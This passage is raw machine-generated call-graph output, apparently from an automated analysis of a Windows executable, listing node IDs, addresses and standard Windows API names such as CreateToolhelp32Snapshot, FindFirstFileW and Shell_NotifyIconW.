96652->96655 96656 eaa780 96652->96656 96653->96652 96654 e2c98d 39 API calls 96653->96654 96654->96652 96655->96656 96657 e90372 58 API calls 96656->96657 96657->96651 96659 e28ec0 52 API calls 96658->96659 96660 eaad63 96659->96660 97128 e8dd87 CreateToolhelp32Snapshot Process32FirstW 96660->97128 96662 eaad72 96662->96501 96664 e2c98d 39 API calls 96663->96664 96665 ea186c 96664->96665 96666 e2c98d 39 API calls 96665->96666 96668 ea18a9 96665->96668 96666->96668 96667 ea18cc 96667->96501 96668->96667 96669 e2b4c8 8 API calls 96668->96669 96669->96667 96671 e28ec0 52 API calls 96670->96671 96672 e96662 96671->96672 97196 e8dc54 96672->97196 96674 e9666a 96675 e9666e GetLastError 96674->96675 96676 e96683 96674->96676 96675->96676 96676->96501 96678 ea7b38 96677->96678 96679 ea7b52 96677->96679 97238 e93fe1 81 API calls __wsopen_s 96678->97238 96681 ea60e6 8 API calls 96679->96681 96682 ea7b5d 96681->96682 96683 e30340 206 API calls 96682->96683 96684 ea7bc1 96683->96684 96685 ea7c5c 96684->96685 96688 ea7b4a 96684->96688 96690 ea7c03 96684->96690 96686 ea7c62 96685->96686 96687 ea7cb0 96685->96687 97239 e91ad8 8 API calls 96686->97239 96687->96688 96689 e28ec0 52 API calls 96687->96689 96688->96463 96691 ea7cc2 96689->96691 96695 e9148b 8 API calls 96690->96695 96693 e2c2c9 8 API calls 96691->96693 96697 ea7ce6 CharUpperBuffW 96693->96697 96694 ea7c85 97240 e2bd07 8 API calls 96694->97240 96696 ea7c3b 96695->96696 96699 e32b20 206 API calls 96696->96699 96700 ea7d00 96697->96700 96699->96688 96701 ea7d53 96700->96701 96702 ea7d07 96700->96702 96703 e28ec0 52 API calls 96701->96703 96706 e9148b 8 API calls 96702->96706 96704 ea7d5b 96703->96704 97241 e3aa65 9 API calls 96704->97241 96707 ea7d35 96706->96707 96708 e32b20 206 API calls 96707->96708 96708->96688 96709 ea7d65 96709->96688 96710 e28ec0 52 API calls 96709->96710 96711 ea7d80 96710->96711 97242 e2bd07 8 API calls 96711->97242 96713->96502 96714->96461 96716 e2b338 _wcslen 96715->96716 96717 e4017b 8 API calls 96716->96717 96718 e2b360 __fread_nolock 96717->96718 96719 e4014b 8 API calls 96718->96719 96720 e2b376 96719->96720 96720->96475 96721->96464 96722->96487 96723->96492 96724->96501 96725->96501 96726->96501 96727->96499 96728->96501 96729->96572 96730->96569 96731->96574 96732->96576 96734 e28ec0 52 API calls 96733->96734 96735 ea89ed 96734->96735 96757 ea8a32 ISource 96735->96757 96771 ea9730 96735->96771 96737 ea8cde 96738 ea8eac 96737->96738 96743 ea8cec 96737->96743 96820 ea9941 59 API calls 96738->96820 96741 ea8ebb 96741->96743 96744 ea8ec7 96741->96744 96742 e28ec0 52 API calls 96761 ea8aa6 96742->96761 96784 ea88e3 96743->96784 96744->96757 96749 ea8d25 96798 e3ffe0 96749->96798 96752 ea8d5f 96806 e27e12 96752->96806 96753 ea8d45 96805 e93fe1 81 API calls __wsopen_s 96753->96805 96756 ea8d50 GetCurrentProcess TerminateProcess 96756->96752 96757->96579 96761->96737 96761->96742 96761->96757 96803 e84ad3 8 API calls __fread_nolock 96761->96803 96804 ea8f7a 41 API calls _strftime 96761->96804 96762 ea8f22 96762->96757 96767 ea8f36 FreeLibrary 96762->96767 96764 ea8d9e 96818 ea95d8 74 API calls 96764->96818 96767->96757 96769 e2b4c8 8 API calls 96770 ea8daf 96769->96770 96770->96762 96770->96769 96819 e31ca0 8 API calls 96770->96819 96821 ea95d8 74 API calls 96770->96821 96822 e2c2c9 96771->96822 96773 ea974b CharLowerBuffW 96828 e89805 96773->96828 96780 ea979b 96852 e2adf4 96780->96852 96782 ea98bb _wcslen 96782->96761 96783 ea97a5 _wcslen 96783->96782 96856 ea8f7a 41 API calls _strftime 96783->96856 96785 ea8949 96784->96785 96786 ea88fe 96784->96786 96790 ea9af3 96785->96790 96787 e4017b 8 API calls 96786->96787 96788 ea8920 96787->96788 96788->96785 96789 e4014b 8 API calls 96788->96789 96789->96788 96791 ea9d08 ISource 96790->96791 96795 ea9b17 _strcat _wcslen ___std_exception_copy 96790->96795 96791->96749 96792 e2ca5b 39 API calls 96792->96795 96793 e2c98d 39 API calls 96793->96795 96794 e2c63f 39 API calls 96794->96795 96795->96791 96795->96792 96795->96793 96795->96794 96796 e28ec0 52 API calls 96795->96796 96860 e8f8c5 10 API calls _wcslen 96795->96860 96796->96795 96800 e3fff5 96798->96800 96799 e4008d Sleep 96801 e4005b 96799->96801 96800->96799 96800->96801 96802 e4007b CloseHandle 96800->96802 96801->96752 96801->96753 96802->96801 96803->96761 96804->96761 96805->96756 96807 e27e1a 96806->96807 96808 e4014b 8 API calls 96807->96808 96809 e27e28 96808->96809 96861 e28445 96809->96861 96812 e28470 96864 e2c760 96812->96864 96814 e4017b 8 API calls 96816 e2851c 96814->96816 96815 e28480 96815->96814 96815->96816 96816->96770 96817 e31ca0 8 API calls 96816->96817 96817->96764 96818->96770 96819->96770 96820->96741 96821->96770 96823 e2c2d9 __fread_nolock 96822->96823 96824 e2c2dc 96822->96824 96823->96773 96825 e4014b 8 API calls 96824->96825 96826 e2c2e7 96825->96826 96827 e4017b 8 API calls 96826->96827 96827->96823 96830 e89825 _wcslen 96828->96830 96829 e89914 96829->96783 96835 e2bf73 96829->96835 96830->96829 96831 e8985a 96830->96831 96834 e89919 96830->96834 96831->96829 96857 e3e36b 41 API calls 96831->96857 96834->96829 96858 e3e36b 41 API calls 96834->96858 96836 e4017b 8 API calls 96835->96836 96837 e2bf88 96836->96837 96838 e4014b 8 API calls 96837->96838 96839 e2bf96 96838->96839 96840 e2acc0 96839->96840 96843 e2ace1 96840->96843 96851 e2accf 96840->96851 96841 e2acda __fread_nolock 96841->96780 96842 e2c2c9 8 API calls 96844 e705a3 __fread_nolock 96842->96844 96845 e70557 96843->96845 96846 e2ad07 96843->96846 96843->96851 96848 e4014b 8 API calls 96845->96848 96859 e288e8 8 API calls 96846->96859 96849 e70561 96848->96849 96850 e4017b 8 API calls 96849->96850 96850->96851 96851->96841 96851->96842 96853 e2ae02 96852->96853 96854 e2ae0b __fread_nolock 96852->96854 96853->96854 96855 e2c2c9 8 API calls 96853->96855 96854->96783 96854->96854 96855->96854 96856->96782 96857->96831 96858->96834 96859->96841 96860->96795 96862 e4014b 8 API calls 96861->96862 96863 e27e30 96862->96863 96863->96812 96865 e2c76b 96864->96865 96866 e71285 96865->96866 96871 e2c773 ISource 96865->96871 96867 e4014b 8 API calls 96866->96867 96869 e71291 96867->96869 96868 e2c77a 96868->96815 96871->96868 96872 e2c7e0 8 API calls ISource 96871->96872 96872->96871 96874 e918b6 96873->96874 96875 e4014b 8 API calls 96874->96875 96876 e918bd 96875->96876 96879 e8fcb5 96876->96879 96878 e918f7 96878->96585 96880 e2c2c9 8 API calls 96879->96880 96881 e8fcc8 CharLowerBuffW 96880->96881 96887 e8fcdb 96881->96887 96882 e8fce5 ___scrt_fastfail 96882->96878 96883 e8fd19 96885 e8fd2b 96883->96885 96912 e2655e 96883->96912 96884 e2655e 8 API calls 96884->96887 96886 e4017b 8 API calls 96885->96886 96889 e8fd59 96886->96889 96887->96882 96887->96883 96887->96884 96890 e8fd7b 96889->96890 96915 e8fbed 8 API calls 96889->96915 96897 e8fe0c 96890->96897 96893 e8fdb8 96893->96882 96894 e4014b 8 API calls 96893->96894 96895 e8fdd2 96894->96895 96896 e4017b 8 API calls 96895->96896 96896->96882 96898 e2bf73 8 API calls 96897->96898 96899 e8fe3e 96898->96899 96900 e2bf73 8 API calls 96899->96900 96901 e8fe47 96900->96901 96902 e2bf73 8 API calls 96901->96902 96910 e8fe50 96902->96910 96903 e28577 8 API calls 96903->96910 96904 e90114 96904->96893 96905 e466f8 GetStringTypeW 96905->96910 96907 e46641 39 API calls 96907->96910 96908 e8fe0c 40 API calls 96908->96910 96909 e2ad40 8 API calls 96909->96910 96910->96903 96910->96904 96910->96905 96910->96907 96910->96908 96910->96909 96911 e2bed9 8 API calls 96910->96911 96916 e46722 GetStringTypeW _strftime 96910->96916 96911->96910 96913 e2c2c9 8 API calls 96912->96913 96914 e26569 96913->96914 96914->96885 96915->96889 96916->96910 96954 e902aa 96917->96954 96920 e9040b 96923 e90471 96920->96923 96926 e9041b 96920->96926 96921 e903f3 96970 e905e9 56 API calls __fread_nolock 96921->96970 96924 e904a1 96923->96924 96925 e90507 96923->96925 96942 e90399 __fread_nolock 96923->96942 96927 e904d1 96924->96927 96928 e904a6 96924->96928 96929 e905b0 96925->96929 96930 e90510 96925->96930 96931 e90453 96926->96931 96971 e92855 10 API calls 96926->96971 96927->96942 96975 e2ca5b 39 API calls 96927->96975 96928->96942 96974 e2ca5b 39 API calls 96928->96974 96929->96942 96979 e2c63f 39 API calls 96929->96979 96932 e9058d 96930->96932 96933 e90515 96930->96933 96961 e91844 96931->96961 96932->96942 96978 e2c63f 39 API calls 96932->96978 96938 e9051b 96933->96938 96939 e90554 96933->96939 96938->96942 96976 e2c63f 39 API calls 96938->96976 96939->96942 96977 e2c63f 39 API calls 96939->96977 96942->96596 96945 e90427 96972 e92855 10 API calls 96945->96972 96947 e9043e __fread_nolock 96973 e92855 10 API calls 96947->96973 96950 e2c99e 96949->96950 96951 e2c9a5 96949->96951 96950->96951 96993 e46641 39 API calls _strftime 96950->96993 96951->96590 96953 e2c9e8 96953->96590 96955 e902f7 96954->96955 96959 e902bb 96954->96959 96957 e2c98d 39 API calls 96955->96957 96956 e902f5 96956->96920 96956->96921 96956->96942 96957->96956 96958 e28ec0 52 API calls 96958->96959 96959->96956 96959->96958 96980 e44d98 96959->96980 96962 e9184f 96961->96962 96963 e4014b 8 API calls 96962->96963 96964 e91856 96963->96964 96965 e91883 96964->96965 96966 e91862 96964->96966 96967 e4017b 8 API calls 96965->96967 96968 e4017b 8 API calls 96966->96968 96969 e9186b ___scrt_fastfail 96967->96969 96968->96969 96969->96942 96970->96942 96971->96945 96972->96947 96973->96931 96974->96942 96975->96942 96976->96942 96977->96942 96978->96942 96979->96942 96981 e44da6 96980->96981 96982 e44e1b 96980->96982 96989 e44dcb 96981->96989 96990 e4f649 20 API calls _free 96981->96990 96992 e44e2d 40 API calls 4 library calls 96982->96992 96985 e44e28 96985->96959 96986 e44db2 96991 e52b5c 26 API calls _abort 96986->96991 96988 e44dbd 96988->96959 96989->96959 96990->96986 96991->96988 96992->96985 96993->96953 96995 e4014b 8 API calls 96994->96995 96996 e2424e 96995->96996 96996->96602 96997->96605 96999 e23996 ___scrt_fastfail 96998->96999 97031 e25f32 96999->97031 97002 e23a1c 97004 e23a3a Shell_NotifyIconW 97002->97004 97005 e640cd Shell_NotifyIconW 97002->97005 97035 e261a9 97004->97035 97007 e23a50 97007->96612 97009 e23969 97008->97009 97010 e23919 ___scrt_fastfail 97008->97010 97009->96612 97011 e23938 Shell_NotifyIconW 97010->97011 97011->97009 97013 e4017b 8 API calls 97012->97013 97014 e27afa 97013->97014 97015 e4014b 8 API calls 97014->97015 97016 e27b08 97015->97016 97016->96612 97017->96612 97018->96612 97020 e28587 _wcslen 97019->97020 97021 e66610 97019->97021 97024 e285c2 97020->97024 97025 e2859d 97020->97025 97022 e2adf4 8 API calls 97021->97022 97023 e66619 97022->97023 97023->97023 97027 e4014b 8 API calls 97024->97027 97112 e288e8 8 API calls 97025->97112 97029 e285ce 97027->97029 97028 e285a5 __fread_nolock 97028->96612 97030 e4017b 8 API calls 97029->97030 97030->97028 97032 e239eb 97031->97032 97033 e25f4e 97031->97033 97032->97002 97065 e8d11f 42 API calls _strftime 97032->97065 97033->97032 97034 e65070 DestroyIcon 97033->97034 97034->97032 97036 e261c6 97035->97036 97054 e262a8 97035->97054 97037 e27ad5 8 API calls 97036->97037 97038 e261d4 97037->97038 97039 e261e1 97038->97039 97040 e65278 LoadStringW 97038->97040 97041 e28577 8 API calls 97039->97041 97043 e65292 97040->97043 97042 e261f6 97041->97042 97044 e26203 97042->97044 97045 e652ae 97042->97045 97047 e2bed9 8 API calls 97043->97047 97064 e26229 ___scrt_fastfail 97043->97064 97044->97043 97046 e2620d 97044->97046 97051 e652f1 97045->97051 97053 e2bf73 8 API calls 97045->97053 97045->97064 97066 e26b7c 97046->97066 97047->97064 97085 e3fe6f 51 API calls 97051->97085 97052 e2628e Shell_NotifyIconW 97052->97054 97055 e652d8 97053->97055 97054->97007 97084 e8a350 9 API calls 97055->97084 97058 e65310 97060 e26b7c 8 API calls 97058->97060 97059 e652e3 97061 e27bb5 8 API calls 97059->97061 97062 e65321 97060->97062 97061->97051 97063 e26b7c 8 API calls 97062->97063 97063->97064 97064->97052 97065->97002 97067 e26b93 97066->97067 97068 e657fe 97066->97068 97086 e26ba4 97067->97086 97070 e4014b 8 API calls 97068->97070 97072 e65808 _wcslen 97070->97072 97071 e2621b 97075 e27bb5 97071->97075 97073 e4017b 8 API calls 97072->97073 97074 e65841 __fread_nolock 97073->97074 97076 e27bc7 97075->97076 97077 e6641d 97075->97077 97101 e27bd8 97076->97101 97111 e813c8 8 API calls __fread_nolock 97077->97111 97080 e27bd3 97080->97064 97081 e66427 97082 e2bed9 8 API calls 97081->97082 97083 e66433 97081->97083 97082->97083 97084->97059 97085->97058 97087 e26bb4 _wcslen 97086->97087 97088 e26bc7 97087->97088 97089 e65860 97087->97089 97096 e27d74 97088->97096 97090 e4014b 8 API calls 97089->97090 97092 e6586a 97090->97092 97094 e4017b 8 API calls 97092->97094 97093 e26bd4 __fread_nolock 97093->97071 97095 e6589a __fread_nolock 97094->97095 97097 e27d8a 97096->97097 97100 e27d85 __fread_nolock 97096->97100 97098 e4017b 8 API calls 97097->97098 97099 e66528 97097->97099 97098->97100 97099->97099 97100->97093 97102 e27be7 97101->97102 97108 e27c1b __fread_nolock 97101->97108 97103 e6644e 97102->97103 97104 e27c0e 97102->97104 97102->97108 97105 e4014b 8 API calls 97103->97105 97106 e27d74 8 API calls 97104->97106 97107 e6645d 97105->97107 97106->97108 97109 e4017b 8 API calls 97107->97109 97108->97080 97110 e66491 __fread_nolock 97109->97110 97111->97081 97112->97028 97114 e4017b 8 API calls 97113->97114 97115 e3c209 97114->97115 97116 e4014b 8 API calls 97115->97116 97117 e3c215 97116->97117 97117->96633 97119 e3fa35 97118->97119 97120 e3f9fe 97118->97120 97127 e3fe8a 8 API calls 97119->97127 97122 e4017b 8 API calls 97120->97122 97123 e3fa05 WideCharToMultiByte 97122->97123 97126 e3fa3e 8 API calls __fread_nolock 97123->97126 97125 e3fa29 97125->96638 97126->97125 97127->97125 97138 e8e80e 97128->97138 97130 e8ddd4 Process32NextW 97131 e8de86 CloseHandle 97130->97131 97137 e8ddcd 97130->97137 97131->96662 97132 e2bf73 8 API calls 97132->97137 97133 e2b329 8 API calls 97133->97137 97135 e27bb5 8 API calls 97135->97137 97137->97130 97137->97131 97137->97132 97137->97133 97137->97135 97144 e2568e 97137->97144 97186 e3e36b 41 API calls 97137->97186 97139 e8e819 97138->97139 97140 e8e830 97139->97140 97143 e8e836 97139->97143 97187 e46722 GetStringTypeW _strftime 97139->97187 97188 e4666b 39 API calls _strftime 97140->97188 97143->97137 97145 e2bf73 8 API calls 97144->97145 97146 e256a4 97145->97146 97147 e2bf73 8 API calls 97146->97147 97148 e256ac 97147->97148 97149 e2bf73 8 API calls 97148->97149 97150 e256b4 97149->97150 97151 e2bf73 8 API calls 97150->97151 97152 e256bc 97151->97152 97153 e256f0 97152->97153 97154 e64da1 97152->97154 97156 e2acc0 8 API calls 97153->97156 97155 e2bed9 8 API calls 97154->97155 97157 e64daa 97155->97157 97158 e256fe 97156->97158 97189 e2bd57 97157->97189 97160 e2adf4 8 API calls 97158->97160 97161 e25708 97160->97161 97162 e2acc0 8 API calls 97161->97162 97163 e25733 97161->97163 97164 e25729 97162->97164 97165 e25754 97163->97165 97176 e64dcc 97163->97176 97179 e25778 97163->97179 97167 e2adf4 8 API calls 97164->97167 97170 e2655e 8 API calls 97165->97170 97165->97179 97166 e2acc0 8 API calls 97168 e25789 97166->97168 97167->97163 97169 e2579f 97168->97169 97174 e2bed9 8 API calls 97168->97174 97171 e257b3 97169->97171 97177 e2bed9 8 API calls 97169->97177 97172 e25761 97170->97172 97175 e257be 97171->97175 97180 e2bed9 8 API calls 97171->97180 97178 e2acc0 8 API calls 97172->97178 97172->97179 97173 e28577 8 API calls 97183 e64e8c 97173->97183 97174->97169 97181 e2bed9 8 API calls 97175->97181 97184 e257c9 97175->97184 97176->97173 97177->97171 97178->97179 97179->97166 97180->97175 97181->97184 97182 e2655e 8 API calls 97182->97183 97183->97179 97183->97182 97195 e2ad40 8 API calls __fread_nolock 97183->97195 97184->97137 97186->97137 97187->97139 97188->97143 97190 e2bd71 97189->97190 97191 e2bd64 97189->97191 97192 e4014b 8 API calls 97190->97192 97191->97163 97193 e2bd7b 97192->97193 97194 e4017b 8 API calls 97193->97194 97194->97191 97195->97183 97197 e2bf73 8 API calls 97196->97197 97198 e8dc73 97197->97198 97199 e2bf73 8 API calls 97198->97199 97200 e8dc7c 97199->97200 97201 e2bf73 8 API calls 97200->97201 97202 e8dc85 97201->97202 97220 e25851 97202->97220 97207 e8dcab 97209 e2568e 8 API calls 97207->97209 97208 e26b7c 8 API calls 97208->97207 97210 e8dcbf FindFirstFileW 97209->97210 97211 e8dd4b FindClose 97210->97211 97216 e8dcde 97210->97216 97212 e8dd56 97211->97212 97212->96674 97213 e8dd26 FindNextFileW 97213->97216 97214 e2bed9 8 API calls 97214->97216 97215 e27bb5 8 API calls 97215->97216 97216->97211 97216->97213 97216->97214 97216->97215 97217 e26b7c 8 API calls 97216->97217 97218 e8dd17 DeleteFileW 97217->97218 97218->97213 97219 e8dd42 FindClose 97218->97219 97219->97212 97232 e622d0 97220->97232 97223 e25898 97225 e2bd57 8 API calls 97223->97225 97224 e2587d 97226 e28577 8 API calls 97224->97226 97227 e25889 97225->97227 97226->97227 97234 e255dc 97227->97234 97230 e8eab0 GetFileAttributesW 97231 e8dc99 97230->97231 97231->97207 97231->97208 97233 e2585e GetFullPathNameW 97232->97233 97233->97223 97233->97224 97235 e255ea 97234->97235 97236 e2adf4 8 API calls 97235->97236 97237 e255fe 97236->97237 97237->97230 97238->96688 97239->96694 97240->96688 97241->96709 97242->96688 97243->96525 97244->96525 97245->96524 97246->96528 97247->96426 97248->96424 97249->96428 97250->96428 97268 e2cf80 97251->97268 97253 e2bfb5 97254 e70db6 97253->97254 97255 e2bfc3 97253->97255 97256 e2b4c8 8 API calls 97254->97256 97257 e4014b 8 API calls 97255->97257 97258 e70dc1 97256->97258 97259 e2bfd4 97257->97259 97260 e2bf73 8 API calls 97259->97260 97261 e2bfde 97260->97261 97262 e2bfed 97261->97262 97263 e2bed9 8 API calls 97261->97263 97264 e4014b 8 API calls 97262->97264 97263->97262 97265 e2bff7 97264->97265 97276 e2be7b 39 API calls 97265->97276 97267 e2c01b 97267->96330 97269 e2d1c7 97268->97269 97273 e2cf93 97268->97273 97269->97253 97271 e2bf73 8 API calls 97271->97273 97272 e2d03d 97272->97253 97273->97271 97273->97272 97277 e405b2 5 API calls __Init_thread_wait 97273->97277 97278 e40413 29 API calls __onexit 97273->97278 97279 e40568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97273->97279 97276->97267 97277->97273 97278->97273 97279->97273 98822 e58782 98827 e5853e 98822->98827 98825 e587aa 98833 e5856f try_get_first_available_module 98827->98833 98828 e586b8 98832 e586c3 98828->98832 98845 e4f649 20 API calls _free 98828->98845 98830 e5876e 98846 e52b5c 26 API calls _abort 98830->98846 98832->98825 98839 e60d04 98832->98839 98833->98828 98842 e4917b 40 API calls 2 library calls 98833->98842 98835 e5870c 98835->98828 98843 e4917b 40 API calls 2 library calls 98835->98843 98837 e5872b 98837->98828 98844 e4917b 40 API calls 2 library calls 98837->98844 98847 e60401 98839->98847 98841 e60d1f 98841->98825 98842->98835 98843->98837 98844->98828 98845->98830 98846->98832 98850 e6040d ___DestructExceptionObject 98847->98850 98848 e6041b 98905 e4f649 20 API calls _free 98848->98905 98850->98848 98852 e60454 98850->98852 98851 e60420 98906 e52b5c 26 API calls _abort 98851->98906 98858 e609db 98852->98858 98857 e6042a __wsopen_s 98857->98841 98908 e607af 98858->98908 98861 e60a26 98926 e55594 98861->98926 98862 e60a0d 98940 e4f636 20 API calls _free 98862->98940 98865 e60a2b 98866 e60a34 98865->98866 98867 e60a4b 98865->98867 98942 e4f636 20 API calls _free 98866->98942 98939 e6071a CreateFileW 98867->98939 98871 e60478 98907 e604a1 LeaveCriticalSection __wsopen_s 98871->98907 98872 e60a39 98943 e4f649 20 API calls _free 98872->98943 98874 e60b01 GetFileType 98875 e60b53 98874->98875 98876 e60b0c GetLastError 98874->98876 98948 e554dd 21 API calls 3 library calls 98875->98948 98946 e4f613 20 API calls 2 library calls 98876->98946 98877 e60a12 98941 e4f649 20 API calls _free 98877->98941 98878 e60ad6 GetLastError 98945 e4f613 20 API calls 2 library calls 98878->98945 98881 e60a84 98881->98874 98881->98878 98944 e6071a CreateFileW 98881->98944 98883 e60b1a CloseHandle 98883->98877 98886 e60b43 98883->98886 98884 e60ac9 98884->98874 98884->98878 98947 e4f649 20 API calls _free 98886->98947 98887 e60b74 98889 e60bc0 98887->98889 98949 e6092b 72 API calls 4 library calls 98887->98949 98894 e60bed 98889->98894 98950 e604cd 72 API calls 4 library calls 98889->98950 98890 e60b48 98890->98877 98893 e60be6 98893->98894 98895 e60bfe 98893->98895 98951 e58a2e 98894->98951 98895->98871 98897 e60c7c CloseHandle 98895->98897 98966 e6071a CreateFileW 98897->98966 98899 e60ca7 98900 e60cdd 98899->98900 98901 e60cb1 GetLastError 98899->98901 98900->98871 98967 e4f613 20 API calls 2 library calls 98901->98967 98903 e60cbd 98968 e556a6 21 API calls 3 library calls 98903->98968 98905->98851 98906->98857 98907->98857 98909 e607ea 98908->98909 98910 e607d0 98908->98910 98969 e6073f 98909->98969 98910->98909 98976 e4f649 20 API calls _free 98910->98976 98913 e60822 98916 e60851 98913->98916 98978 e4f649 20 API calls _free 98913->98978 98914 e607df 98977 e52b5c 26 API calls _abort 98914->98977 98924 e608a4 98916->98924 98980 e4da7d 26 API calls 2 library calls 98916->98980 98919 e6089f 98921 e6091e 98919->98921 98919->98924 98920 e60846 98979 e52b5c 26 API calls _abort 98920->98979 98981 e52b6c 11 API calls _abort 98921->98981 98924->98861 98924->98862 98925 e6092a 98927 e555a0 ___DestructExceptionObject 98926->98927 98984 e532d1 EnterCriticalSection 98927->98984 98929 e555a7 98930 e555cc 98929->98930 98935 e5563a EnterCriticalSection 98929->98935 98937 e555ee 98929->98937 98932 e55373 __wsopen_s 21 API calls 98930->98932 98934 e555d1 98932->98934 98933 e55617 __wsopen_s 98933->98865 98934->98937 98988 e554ba EnterCriticalSection 98934->98988 98936 e55647 LeaveCriticalSection 98935->98936 98935->98937 98936->98929 98985 e5569d 98937->98985 98939->98881 98940->98877 98941->98871 98942->98872 98943->98877 98944->98884 98945->98877 98946->98883 98947->98890 98948->98887 98949->98889 98950->98893 98952 e55737 __wsopen_s 26 API calls 98951->98952 98954 e58a3e 98952->98954 98953 e58a44 98990 e556a6 21 API calls 3 library calls 98953->98990 98954->98953 98955 e58a76 98954->98955 98957 e55737 __wsopen_s 26 API calls 98954->98957 98955->98953 98958 e55737 __wsopen_s 26 API calls 98955->98958 98961 e58a6d 98957->98961 98962 e58a82 CloseHandle 98958->98962 98959 e58a9c 98960 e58abe 98959->98960 98991 e4f613 20 API calls 2 library calls 98959->98991 98960->98871 98964 e55737 __wsopen_s 26 API calls 98961->98964 98962->98953 98965 e58a8e GetLastError 98962->98965 98964->98955 98965->98953 98966->98899 98967->98903 98968->98900 98971 e60757 98969->98971 98970 e60772 98970->98913 98971->98970 98982 e4f649 20 API calls _free 98971->98982 98973 e60796 98983 e52b5c 26 API calls _abort 98973->98983 98975 e607a1 98975->98913 98976->98914 98977->98909 98978->98920 98979->98916 98980->98919 98981->98925 98982->98973 98983->98975 98984->98929 98989 e53319 LeaveCriticalSection 98985->98989 98987 e556a4 98987->98933 98988->98937 98989->98987 98990->98959 98991->98960 97280 e765af 97281 e4014b 8 API calls 97280->97281 97282 e765b6 97281->97282 97286 e8fafb 97282->97286 97284 e765c2 97285 e8fafb 8 API calls 97284->97285 97285->97284 97287 e8fb1b 97286->97287 97288 e8fbe4 97287->97288 97289 e4017b 8 API calls 97287->97289 97288->97284 97290 e8fb57 97289->97290 97292 e8fb79 97290->97292 97294 e8fbed 8 API calls 97290->97294 97292->97288 97293 e2bed9 8 API calls 97292->97293 97293->97292 97294->97290 98992 e2da4a 98993 e2da54 98992->98993 99002 e2dbc4 98992->99002 98994 e2cf80 39 API calls 98993->98994 98993->99002 98995 e2dace 98994->98995 98996 e4014b 8 API calls 98995->98996 98997 e2dae7 98996->98997 98998 e4017b 8 API calls 98997->98998 98999 e2db05 98998->98999 99000 e4014b 8 API calls 98999->99000 99003 e2db16 __fread_nolock 99000->99003 99001 e4014b 8 API calls 99005 e2db7f 99001->99005 99004 e4017b 8 API calls 99002->99004 99006 e2d5e1 99002->99006 99009 e2dc19 99002->99009 99003->99001 99003->99002 99004->99002 99005->99002 99007 e2cf80 39 API calls 99005->99007 99008 e4014b 8 API calls 99006->99008 99007->99002 99014 e2d66e ISource 99008->99014 99010 e2c3ab 8 API calls 99020 e2d9ac ISource 99010->99020 99011 e2bed9 8 API calls 99011->99014 99012 e2b4c8 8 API calls 99012->99014 99014->99011 99014->99012 99015 e71f79 99014->99015 99016 e71f94 99014->99016 99018 e2c3ab 8 API calls 99014->99018 99019 e2d911 ISource 99014->99019 99023 e856ae 8 API calls ISource 99015->99023 99018->99014 99019->99010 99019->99020 99021 e2d9c3 99020->99021 99022 e3e30a 8 API calls ISource 99020->99022 99022->99020 99023->99016 97295 e4f06e 97296 e4f07a ___DestructExceptionObject 97295->97296 97297 e4f086 97296->97297 97298 e4f09b 97296->97298 97314 e4f649 20 API calls _free 97297->97314 97308 e494fd EnterCriticalSection 97298->97308 97301 e4f08b 97315 e52b5c 26 API calls _abort 97301->97315 97302 e4f0a7 97309 e4f0db 97302->97309 97307 e4f096 __wsopen_s 97308->97302 97317 e4f106 97309->97317 97311 e4f0e8 97312 e4f0b4 97311->97312 97337 e4f649 20 API calls _free 97311->97337 97316 e4f0d1 LeaveCriticalSection __fread_nolock 97312->97316 97314->97301 97315->97307 97316->97307 97318 e4f114 97317->97318 97319 e4f12e 97317->97319 97348 e4f649 20 API calls _free 97318->97348 97338 e4dcc5 97319->97338 97322 e4f119 97349 e52b5c 26 API calls _abort 97322->97349 97323 e4f137 97345 e59789 97323->97345 97327 e4f1bf 97331 e4f1dc 97327->97331 97333 e4f1ee 97327->97333 97328 e4f23b 97329 e4f248 97328->97329 97328->97333 97351 e4f649 20 API calls _free 97329->97351 97350 e4f41f 31 API calls 4 library calls 97331->97350 97336 e4f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97333->97336 97352 e4f29b 30 API calls 2 library calls 97333->97352 97334 e4f1e6 97334->97336 97336->97311 97337->97312 97339 e4dce6 97338->97339 97340 e4dcd1 97338->97340 97339->97323 97353 e4f649 20 API calls _free 97340->97353 97342 e4dcd6 97354 e52b5c 26 API calls _abort 97342->97354 97344 e4dce1 97344->97323 97355 e59606 97345->97355 97347 e4f153 97347->97327 97347->97328 97347->97336 97348->97322 97349->97336 97350->97334 97351->97336 97352->97336 97353->97342 97354->97344 97356 e59612 ___DestructExceptionObject 97355->97356 97357 e59632 97356->97357 97358 e5961a 97356->97358 97360 e596e6 97357->97360 97364 e5966a 97357->97364 97390 e4f636 20 API calls _free 97358->97390 97395 e4f636 20 API calls _free 97360->97395 97361 e5961f 97391 e4f649 20 API calls _free 97361->97391 97363 e596eb 97396 e4f649 20 API calls _free 97363->97396 97380 e554ba EnterCriticalSection 97364->97380 97368 e596f3 97397 e52b5c 26 API calls _abort 97368->97397 97369 e59670 97371 e59694 97369->97371 97372 e596a9 97369->97372 97392 e4f649 20 API calls _free 97371->97392 97381 e5970b 97372->97381 97374 e59627 __wsopen_s 97374->97347 97376 e59699 97393 e4f636 20 API calls _free 97376->97393 97377 e596a4 97394 e596de LeaveCriticalSection __wsopen_s 97377->97394 97380->97369 97398 e55737 97381->97398 97383 e5971d 97384 e59725 97383->97384 97385 e59736 SetFilePointerEx 97383->97385 97411 e4f649 20 API calls _free 97384->97411 97387 e5972a 97385->97387 97388 e5974e GetLastError 97385->97388 97387->97377 97412 e4f613 20 API calls 2 library calls 97388->97412 97390->97361 97391->97374 97392->97376 97393->97377 97394->97374 97395->97363 97396->97368 97397->97374 97399 e55744 97398->97399 97401 e55759 97398->97401 97413 e4f636 20 API calls _free 97399->97413 97405 e5577e 97401->97405 97415 e4f636 20 API calls _free 97401->97415 97402 e55749 97414 e4f649 20 API calls _free 97402->97414 97405->97383 97406 e55789 97416 e4f649 20 API calls _free 97406->97416 97407 e55751 97407->97383 97409 e55791 97417 e52b5c 26 API calls _abort 97409->97417 97411->97387 97412->97387 97413->97402 97414->97407 97415->97406 97416->97409 97417->97407 99024 e73c0a 99045 e8c819 99024->99045 99026 e73c14 99028 e8c819 Sleep 99026->99028 99029 e73c3f 99026->99029 99035 e2efdb 99026->99035 99051 e3aa65 9 API calls 99026->99051 99028->99026 99030 e2b329 8 API calls 99029->99030 99031 e73c6f 99030->99031 99032 e2bfa5 39 API calls 99031->99032 99033 e73c8b 99032->99033 99052 e9446f 8 API calls 99033->99052 99038 e2f450 99035->99038 99036 e2f097 99039 e2f483 99038->99039 99040 e2f46f 99038->99040 99085 e93fe1 81 API calls __wsopen_s 99039->99085 99053 